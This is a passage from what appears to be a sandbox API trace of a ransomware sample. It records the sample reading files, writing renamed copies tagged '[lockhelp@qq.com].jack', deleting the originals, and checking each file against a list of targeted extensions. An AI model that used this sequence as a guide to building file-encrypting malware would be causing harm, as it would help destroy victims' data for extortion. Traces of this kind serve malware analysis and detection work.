(hFile=0x3dc) returned 1 [0196.158] CloseHandle (hObject=0x3dc) returned 1 [0196.158] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x26) returned 1 [0196.158] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 1 [0196.159] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.159] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.159] lstrlenW (lpString=".doc") returned 4 [0196.159] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0196.159] lstrlenW (lpString=".docx") returned 5 [0196.159] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0196.159] lstrlenW (lpString=".pdf") returned 4 [0196.159] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0196.159] lstrlenW (lpString=".xls") returned 4 [0196.159] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0196.159] lstrlenW (lpString=".xlsx") returned 5 [0196.159] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0196.159] lstrlenW (lpString=".ppt") returned 4 [0196.159] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0196.159] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.159] lstrlenW (lpString=".zip") returned 4 [0196.159] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0196.159] lstrlenW (lpString=".rar") returned 4 [0196.159] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0196.160] lstrlenW (lpString=".bz2") returned 4 [0196.160] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0196.160] lstrlenW (lpString=".7z") returned 3 [0196.160] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0196.160] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.160] lstrlenW (lpString=".dbf") returned 4 [0196.160] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0196.160] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.160] lstrlenW (lpString=".1cd") returned 4 [0196.160] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0196.160] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.160] lstrlenW (lpString=".jpg") returned 4 [0196.160] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0196.160] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.160] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.160] lstrlenW (lpString=".doc") returned 4 [0196.160] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0196.160] lstrlenW (lpString=".docx") returned 5 [0196.160] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0196.160] lstrlenW (lpString=".pdf") returned 4 [0196.160] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0196.160] lstrlenW (lpString=".xls") returned 4 [0196.160] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0196.160] lstrlenW (lpString=".xlsx") returned 5 [0196.160] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0196.161] lstrlenW (lpString=".ppt") returned 4 [0196.161] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0196.161] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.161] lstrlenW (lpString=".zip") returned 4 [0196.161] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0196.161] lstrlenW (lpString=".rar") returned 4 [0196.161] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0196.161] lstrlenW (lpString=".bz2") returned 4 [0196.161] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0196.161] lstrlenW (lpString=".7z") returned 3 [0196.161] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0196.161] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.161] lstrlenW (lpString=".dbf") returned 4 [0196.161] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0196.161] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.161] lstrlenW (lpString=".1cd") returned 4 [0196.161] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0196.161] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0196.161] lstrlenW (lpString=".jpg") returned 4 [0196.161] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0196.161] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0196.161] lstrlenW (lpString="eula.rtf") returned 8 [0196.162] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.162] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=7567) returned 1 [0196.162] CloseHandle (hObject=0x3dc) returned 1 [0196.162] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf")) returned 0x80 [0196.163] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.163] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.163] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.163] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.163] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.342] GetLastError () returned 0x0 [0196.342] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x1d8f, lpOverlapped=0x0) returned 1 [0196.344] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x1d90, lpOverlapped=0x0) returned 1 [0196.345] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.345] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0196.345] SetEndOfFile (hFile=0x3ec) returned 1 [0196.346] CloseHandle (hObject=0x3ec) returned 1 [0196.349] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.349] SetEndOfFile (hFile=0x3dc) returned 1 [0196.350] CloseHandle (hObject=0x3dc) returned 1 [0196.350] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.351] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf")) returned 1 [0196.351] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.351] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.351] lstrlenW (lpString=".doc") returned 4 [0196.351] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.351] lstrlenW (lpString=".docx") returned 5 [0196.351] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.351] lstrlenW (lpString=".pdf") returned 4 [0196.351] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.351] lstrlenW (lpString=".xls") returned 4 [0196.351] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.351] lstrlenW (lpString=".xlsx") returned 5 [0196.351] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.351] lstrlenW (lpString=".ppt") returned 4 [0196.351] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.351] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.351] lstrlenW (lpString=".zip") returned 4 [0196.351] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.351] lstrlenW (lpString=".rar") returned 4 [0196.352] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.352] lstrlenW (lpString=".bz2") returned 4 [0196.352] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.352] lstrlenW (lpString=".7z") returned 3 [0196.352] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.352] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.352] lstrlenW (lpString=".dbf") returned 4 [0196.352] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.352] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.352] lstrlenW (lpString=".1cd") returned 4 [0196.352] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.352] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.352] lstrlenW (lpString=".jpg") returned 4 [0196.352] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.352] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.352] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.352] lstrlenW (lpString=".doc") returned 4 [0196.352] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.352] lstrlenW (lpString=".docx") returned 5 [0196.352] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.352] lstrlenW (lpString=".pdf") returned 4 [0196.352] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.352] lstrlenW (lpString=".xls") returned 4 [0196.352] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.352] lstrlenW (lpString=".xlsx") returned 5 [0196.352] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.352] lstrlenW (lpString=".ppt") returned 4 [0196.353] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.353] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.353] lstrlenW (lpString=".zip") returned 4 [0196.353] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.353] lstrlenW (lpString=".rar") returned 4 [0196.353] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.353] lstrlenW (lpString=".bz2") returned 4 [0196.353] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.353] lstrlenW (lpString=".7z") returned 3 [0196.353] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.353] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.353] lstrlenW (lpString=".dbf") returned 4 [0196.353] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.353] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.353] lstrlenW (lpString=".1cd") returned 4 [0196.353] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.353] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 35 [0196.353] lstrlenW (lpString=".jpg") returned 4 [0196.353] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.353] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0196.353] lstrlenW (lpString="eula.rtf") returned 8 [0196.353] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.354] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=6309) returned 1 [0196.354] CloseHandle (hObject=0x3dc) returned 1 [0196.354] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf")) returned 0x80 [0196.354] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.354] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.354] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.354] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.354] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0196.930] GetLastError () returned 0x0 [0196.930] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x18a5, lpOverlapped=0x0) returned 1 [0196.931] WriteFile (in: hFile=0x410, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x18b0, lpOverlapped=0x0) returned 1 [0196.932] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.932] WriteFile (in: hFile=0x410, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0196.932] SetEndOfFile (hFile=0x410) returned 1 [0196.933] CloseHandle (hObject=0x410) returned 1 [0196.937] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.937] SetEndOfFile (hFile=0x3dc) returned 1 [0196.940] CloseHandle (hObject=0x3dc) returned 1 [0196.940] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.941] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf")) returned 1 [0196.941] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.941] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.941] lstrlenW (lpString=".doc") returned 4 [0196.941] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.941] lstrlenW (lpString=".docx") returned 5 [0196.941] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.941] lstrlenW (lpString=".pdf") returned 4 [0196.941] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.941] lstrlenW (lpString=".xls") returned 4 [0196.941] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.941] lstrlenW (lpString=".xlsx") returned 5 [0196.941] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.941] lstrlenW (lpString=".ppt") returned 4 [0196.941] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.942] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.942] lstrlenW (lpString=".zip") returned 4 [0196.942] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.942] lstrlenW (lpString=".rar") returned 4 [0196.942] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.942] lstrlenW (lpString=".bz2") returned 4 [0196.942] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.942] lstrlenW (lpString=".7z") returned 3 [0196.942] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.942] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.942] lstrlenW (lpString=".dbf") returned 4 [0196.942] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.942] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.942] lstrlenW (lpString=".1cd") returned 4 [0196.942] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.942] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.942] lstrlenW (lpString=".jpg") returned 4 [0196.942] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.942] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.942] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.943] lstrlenW (lpString=".doc") returned 4 [0196.943] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.943] lstrlenW (lpString=".docx") returned 5 [0196.943] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.943] lstrlenW (lpString=".pdf") returned 4 [0196.943] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.943] lstrlenW (lpString=".xls") returned 4 [0196.943] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.943] lstrlenW (lpString=".xlsx") returned 5 [0196.943] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.943] lstrlenW (lpString=".ppt") returned 4 [0196.943] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.943] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.943] lstrlenW (lpString=".zip") returned 4 [0196.943] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.943] lstrlenW (lpString=".rar") returned 4 [0196.943] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.943] lstrlenW (lpString=".bz2") returned 4 [0196.943] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.943] lstrlenW (lpString=".7z") returned 3 [0196.943] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.943] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.943] lstrlenW (lpString=".dbf") returned 4 [0196.943] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.943] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.943] lstrlenW (lpString=".1cd") returned 4 [0196.943] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.943] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0196.943] lstrlenW (lpString=".jpg") returned 4 [0196.943] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.944] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0196.944] lstrlenW (lpString="eula.rtf") returned 8 [0196.944] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.944] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=3188) returned 1 [0196.944] CloseHandle (hObject=0x3dc) returned 1 [0196.944] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf")) returned 0x80 [0196.944] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.944] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.945] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.945] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.945] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0196.945] GetLastError () returned 0x0 [0196.945] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xc74, lpOverlapped=0x0) returned 1 [0196.971] WriteFile (in: hFile=0x410, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xc80, lpOverlapped=0x0) returned 1 [0196.973] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.973] WriteFile (in: hFile=0x410, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0196.973] SetEndOfFile (hFile=0x410) returned 1 [0196.973] CloseHandle (hObject=0x410) returned 1 [0196.977] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.977] SetEndOfFile (hFile=0x3dc) returned 1 [0196.978] CloseHandle (hObject=0x3dc) returned 1 [0196.978] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.978] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf")) returned 1 [0196.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.979] lstrlenW (lpString=".doc") returned 4 [0196.979] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.979] lstrlenW (lpString=".docx") returned 5 [0196.979] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.979] lstrlenW (lpString=".pdf") returned 4 [0196.979] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.979] lstrlenW (lpString=".xls") returned 4 [0196.979] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.979] lstrlenW (lpString=".xlsx") returned 5 [0196.979] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.979] lstrlenW (lpString=".ppt") returned 4 [0196.979] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.979] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.979] lstrlenW (lpString=".zip") returned 4 [0196.979] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.979] lstrlenW (lpString=".rar") returned 4 [0196.979] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.979] lstrlenW (lpString=".bz2") returned 4 [0196.979] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.979] lstrlenW (lpString=".7z") returned 3 [0196.979] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.980] lstrlenW (lpString=".dbf") returned 4 [0196.980] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.980] lstrlenW (lpString=".1cd") returned 4 [0196.980] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.980] lstrlenW 